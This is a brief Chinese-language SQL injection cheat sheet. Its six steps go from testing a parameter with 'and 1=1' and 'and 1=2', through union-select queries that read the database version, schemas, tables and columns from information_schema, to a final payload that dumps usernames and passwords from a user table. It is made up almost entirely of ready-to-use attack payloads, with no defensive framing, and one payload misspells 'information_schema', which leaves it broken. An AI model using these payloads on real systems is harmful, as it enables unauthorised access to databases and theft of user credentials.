SQL注入基础知识

1.判断是否有注入

;and 1=1
;and 1=2

2.查看数据库的版本和用户信息版本

id=1 union select 1,version(),database()

3.查看数据库中所有的数据库名称

id=1 union select 1,schema_name from information_schem.schemata

4.查看表名

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

 5.查看列名

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='**'

6.脱库
根据数据库里存放的信息，我在这引用了一个user表

id=1 union select 1,group_concat(username,password) from user